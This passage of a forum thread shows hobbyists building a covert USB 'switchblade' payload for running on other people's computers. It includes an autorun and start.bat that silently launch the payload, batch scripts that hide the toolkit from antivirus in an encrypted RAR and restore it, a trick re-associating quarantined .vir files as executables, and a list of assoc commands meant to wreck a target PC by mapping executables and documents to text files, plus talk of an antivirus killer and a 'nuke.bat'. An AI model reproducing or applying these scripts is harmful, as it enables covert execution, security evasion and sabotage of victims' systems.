Jump to content

USB Pocket-Knife Development


Leapo

Recommended Posts

...my code is much cleaner and readable because i have written my code from scratch and not just ripped the code from the wiki (sorry had to say it)...
No offense taken, I know large portions of my payload are direct rips from the wiki, I'm just trying to make everything play nice together. Once I've crammed everything in, I might go back and start streamlining the inner workings a little (look at how much better fc_slurp.bat and fc_slurp2.bat are compared to their predecessors from version 0.2).

...You posted while I was writing, yes this may be possible but it may also delete the Archive while it is being accessed. to solve that you may need to copy the encrypted volume before extracting. that way you never extract from the original volume and it will stay intact. You could try this with true crypt (good encryption, easy to use via command line) but you may not always have access to extract.
yeah, I was worried about AVs killing the backup archive. I'll give TrueCrypt a shot, copying the archive and then extracting from the copy should keep everything nice and safe (as long as TrueCrypt works)

I know  how to get it U3 compatible. Here we go! I really hope this works

[AutoRun]
open=start.bat

@echo off 

@start /min for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do %i:Manual_Scan.bat

@exit

I will try to upload the U3CUSTOM.ISO when I can.

Re: New version

I have mirrors!

DepositFiles, FileSend, ZUpload, and Badongo.

Once again, many thanks for the help Elmer! I'll copy those mirrors over to my post right now.

Upload your ISO whenever you get a chance. For now, I'll build an ISO on my end using your code and upload it so U3 users can get in on the action.

Re: Protection from AV

I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive?

Truecrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload. It would be harder to make the U3 version of this, but something in the wiki talked about using TrueCrypt with the switchblade.

Yes its actually very simple to do, although the problem is true crypt doesn't always work. then again i guess if you don't have permissions to use true crypt the logs generated wouldn't be much use. Once again It would be a valid idea to copy the volume and never extract from the original volume, AV's can decimate a volume if you can access it.

Now there's an idea, the TrueCrypt volume could be located on the CD partition for the U3 compatible version of my payload. This would ensure that the backup doesn't get nuked (on the U3 version anyway), and still allow for easy access to the guts of the payload on the flash portion of the disk.

BTW, You also said something about working on your own custom solution for this? What might that entail?

Link to comment
Share on other sites

  • Replies 818
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

Wee! I got the ISO done! Use it with the Universal U3 Customizer thing. I forgot how easy it was to make these things with the Universal Customizer.

MegaUpload, RapidShare, Badongo, Deposit Files, and FileSend.

EDIT: Wow, I completely forgot to reply about the TrueCrypt stuff

I don't think the CD partition is big enough to hold the files.

Link to comment
Share on other sites

BTW, You also said something about working on your own custom solution for this? What might that entail?

Pretty much the same concept, I'll go into detail of how i was going to work this If you give me a few days until I have released V2.0 of my payload I can script this for you, else take a crack at it urself.

- copy the original encrypted volume

- mount the second encrypted volume to the next free drive letter

- detect where it was mounted

- execute the payload from the mounted drive

- stash logs on the flash drive not in the encrypted volume

- dismount the encrypted volume

- delete the second encrypted volume

and then possibly move the logs to another encrypted volume if i decide to be paranoid :-P

I am going to modify my payload to work like this after i release V2.0. Ill let you know when I have started working on this.

Link to comment
Share on other sites

Leapo:

You might want to make a note that you need to use the Universal Customizer to use the U3 ISO. Place the U3CUSTOM.ISO file in BIN (I think) for it to use it instead of the defualt one.

Link to comment
Share on other sites

would it be possible to put the exe files on the u3 side also , that way AV programs cant screw with them? (here at work mcafee renames them to .vir files)

Hey just to be a pain you could use the assoc and make all .vir files act like .exe :-P Tho this could also be very bad...

Add this line to start of his PL

ASSOC .vir=exefile

that should make them executable, to fix this so you don't accidentally run a known virus add this to the end of his payload

ASSOC .vir=

This will make windows prompt you if you try to execute the .vir normally :-P Hope this helps, let me know.

Link to comment
Share on other sites

@setzer1411

I think there are too many exe files to be able to fit on the CD Partition. How big is it? Four MB? Seven MB?

@GonZor

That's a really good idea. I think this should be put into the next version of his payload.

Link to comment
Share on other sites

@setzer1411

I think there are too many exe files to be able to fit on the CD Partition. How big is it? Four MB? Seven MB?

@GonZor

That's a really good idea. I think this should be put into the next version of his payload.

Well its his PL its up to him. The U3 partition I have stretched to 13MB on my current PL (V2.0 BETA) and nothing has gone wrong. Although it would require him rewriting a lot of his code.

EDIT - My Current ISO is 13,537,280 bytes

Link to comment
Share on other sites

@ elmer: I'll get right on that.

@ setzer: It would involve some major changes to make my payload run entirely from the U3 portion of the flash drive. I have a working proof of concept that might make putting the files on the CD partition unnecessary anyway. It's basically an automated backup and restore function (currently using an encrypted RAR archive just to see if the concept works, I'm planning on using TrueCrypt in the future for extra security).

Here's how you set it up:

- Set up a clean switchblade that hasn't been nuked by your antivirus yet.

- Download this zip file. (http://rapidshare.com/files/37957439/Restore.zip.html)

- Drop the "Restore" folder (from the zip file you just downloaded) onto the root of the switchblade.

- Open the Restore folder and run "Update_Archive.bat" to make an encrypted backup of the everything on the switchblade.

Now you're all set, after your antivirus has nuked the switchblade again, here's how you restore the backup so you'll be ready to go again:

- Plug the switchblade into a safe computer.

- and run "Restore.bat" to restore the backup.

- Your switchblade is now restored back to the last time you ran "Update_Archive.bat"

Here's the code if you want to take a look at it:

Update_Archive.bat:

:: Removes old backup if it exists
::
del ".Backup.rar"

:: Archives and encryptes the contents of the switchblade with a stupidly long password
::
.rar.exe a -hp[nowayinhelltheycanbreakkthispassword9876309531681145690] -r ".Backup.rar" ".."

Restore.bat:

:: Created a backup copy of our backup. This is just in case you didn't plug your switchblade into
:: a safe computer before attempting to restore. This should keep your real backup safe while the
:: Antivirus nukes the copy
::
copy ".Backup.rar" ".Backup_Safe.rar"

:: Here we unarchive the copy of the backup we just made
::
.rar.exe x -o+ -p[nowayinhelltheycanbreakkthispassword9876309531681145690] ".Backup_Safe.rar" ".."

::And now that it's finished, we deleat the backup of the backup.
::
del ".Backup_Safe.rar"

Keep in mind that this is just a proof of concept! It fools Avast and AVG Antivirus as long as you don't attempt to restore on a system that has it's antivirus active, but I can't yet guarantee that this will be completely fool proof.

@GonZor:

I'm sooo tempted to add that line to my payload :lol: . Only problem is, it'll still break batch scripts that look for *.exe because the file extension has been changed to *.vir

I already have a batch file that changes all executable associations (bat, exe, cmd, etc) to text files, but I'm debating as to weather I should include it as an optional module in my payload, considering it completely screws over whatever system you run it on unless you can get to the recovery console to fix it.

Link to comment
Share on other sites

@GonZor:

I'm sooo tempted to add that line to my payload :lol:

Yeah I'll be adding that option on to completely screw over the computer :-P

With your restore.bat the only thing I can suggest is that you run it at the beginning of your PL, this automates the process. When you think about it it wont make any difference it will just mean the AV decimates your PL as its extracting rather than when its logging, and it doesn't matter if the AV screws over one copy simply because the second copy will always be there. If that makes any sense at all.

Link to comment
Share on other sites

Ok, I've cleaned up my backup script a little and plugged it into Start.bat so that it runs right after avkill.exe (might as well try killing whatever antivirus you have running). I'm also working on a batch file (nuke.bat) that will do all kinds of nasty things to the target computer, not the least of which will be changing most file associations to TXTFILE (disabled by default for obvious reasons). Both new features will be in the next payload version.

I've tested it out, and the restore feature works like a charm, but I have a few concerns about it. First of all, it takes a while to restore the entire flash drive from the backup (although the user can turn it off if they know they won't be needing it). Second, I'm kinda worried about what these repeated write cycles will do to peoples thumbdrives, I don't want to kill anybodys flash drive prematurely because of my backup and restore script.

I'm also toying around with your idea of re-associating *.vir files as executables, but any time a batch file calls for *.exe, it fails. I'm going to keep working on this...

Link to comment
Share on other sites

Yeah I'll be adding that option on to completely screw over the computer :-P

If you really want to screw the computer, do this:

assoc .bat=txtfile
assoc .com=txtfile
assoc .cmd=txtfile
assoc .exe=txtfile
assoc .doc=txtfile
assoc .ppt=txtfile
assoc .xls=txtfile
assoc .jpg=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .avi=txtfile
assoc .mpg=txtfile

and that's just a few of the extensions you could mess with. Credit: Original idea from here.

Link to comment
Share on other sites

Mirror time! ZUpload, MegaUpload, FileSend, Badongo, and Deposit Files.

It's embarassing how much Up-Bandwidth I have. Nobody in my family uploads anything except for a few photos here and there. Also embarassing: How much time I have on my hands.

Link to comment
Share on other sites

Haha, I wasn't exactly planning for the stand-alone script to need mass distribution, as it'll be included in the next full payload build.

Actually...that one might be a good idea after all. Considering that the version I posted here is a drop-in solution that should work on any switchblade, I think I'll throw up a little information about it on the Wiki.

Link to comment
Share on other sites

I've added my Automated Backup and Restore module, as well as the Switchblade Kill Switch module to the Switchblade Packages page of the Wiki.

I'll throw up a link to my payload on the actual USB Switchblade page in a little bit, and maybe make a whole Wiki page dedicated to my payload when I have the time (I can go a lot more in-depth on a wiki page with no character limits).

Link to comment
Share on other sites

@setzer1411

I think there are too many exe files to be able to fit on the CD Partition. How big is it? Four MB? Seven MB?

There isnt a limit to the U3 partion as long as it doent exceed the total size of the  usb stick itself, the switchblade i am running right now has 836 mb on the disk side, (i runn apps like portable ms office 07, firefox, photoshop cs2, and nero premium) but the usb drive i have is 4gb sp it isnt an issue. Even if we cant put the apps on the u3 side the back up mod is very handy.

Link to comment
Share on other sites

There isnt a limit to the U3 partion as long as it doent exceed the total size of the  usb stick itself, the switchblade i am running right now has 836 mb on the disk side, (i runn apps like portable ms office 07, firefox, photoshop cs2, and nero premium) but the usb drive i have is 4gb sp it isnt an issue. Even if we cant put the apps on the u3 side the back up mod is very handy.

Wow, that's cool. The executables could be put on the CD partition. I don't know why I thought that it was limited. I think I read an article that said that once.

Also, you can run Photoshop CS2 from a thumb drive? I knew there was portable MS Office, but that's just downright cool.

Link to comment
Share on other sites

There isnt a limit to the U3 partion as long as it doent exceed the total size of the  usb stick itself, the switchblade i am running right now has 836 mb on the disk side, (i runn apps like portable ms office 07, firefox, photoshop cs2, and nero premium) but the usb drive i have is 4gb sp it isnt an issue. Even if we cant put the apps on the u3 side the back up mod is very handy.

Wow, that's cool. The executables could be put on the CD partition. I don't know why I thought that it was limited. I think I read an article that said that once.

Also, you can run Photoshop CS2 from a thumb drive? I knew there was portable MS Office, but that's just downright cool.

I think the early U3 drives had issues when expanded over 6MB, but the new drives seem to have no issues. Its possible with some modification to get this payload running from the U3 partition although you would either need a massive change in the setup, else it wouldn't be configurable.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...